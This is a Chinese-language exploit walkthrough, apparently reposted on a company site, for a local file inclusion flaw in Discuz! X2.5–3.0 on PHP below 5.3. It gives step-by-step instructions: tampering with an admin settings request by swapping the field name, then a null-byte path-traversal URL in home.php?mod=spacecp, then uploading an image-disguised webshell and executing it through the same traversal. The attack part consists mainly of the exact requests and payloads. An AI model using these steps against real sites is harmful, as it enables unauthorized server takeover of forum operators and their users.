邮箱:service@hongdaqianqiu.com
用户 – 用户栏目 – 栏目分组 – 提交 – 抓包 (我就是在这步出错的,一定要提交,不然抓到的数据包不一样)
|
1
|
Content-Disposition: form-data; name=“settingnew[profilegroupnew][base][available]“
|
改为:
|
1
|
Content-Disposition: form-data; name=“settingnew[profilegroupnew][plugin][available]“
|
访问
|
1
|
/home.php?mod=spacecp&id=../../robots.txt%0057
|
利用:
原帖测试的是dz x3,我测试的是dz x2.5 无视gpc
*********************************************************************
1.首先进后台,抓个包
2.改包
将
|
1
|
Content-Disposition: form-data; name=“settingnew[profilegroupnew][base][available]“
|
改为
|
1
|
Content-Disposition: form-data; name=“settingnew[profilegroupnew][plugin][available]“
|
提交
3.提交过后访问
|
1
|
/home.php?mod=spacecp&id=../../robots.txt%00
|
4.找个地方上传图片马
5.访问图片马
|
1
|
http://192.168.2.190/home.php?mod=spacecp&id=../../data/attachment/forum/201305/24/122111m1464cdtfkc0stt1.gif%00
|
91ri.org:最近比较忙 这个是3天前就被发出来了 跟进慢了 :)
注 要求:discuz X2.5-3.0 环境php<5.3
参考:
http://zone.wooyun.org/content/3894
http://www.unhonker.com/bug/1217.html
http://www.cnseay.com/2896/
本文由网络安全攻防研究室(www.91ri.org)信息安全小组收集整理,转载请注明出处。
Copyright © hongdaChiaki. All Rights Reserved. 鸿大千秋 版权所有
联系方式:
地址: 深圳市南山区招商街道沿山社区沿山路43号创业壹号大楼A栋107室
邮箱:service@hongdaqianqiu.com
备案号:粤ICP备15078875号
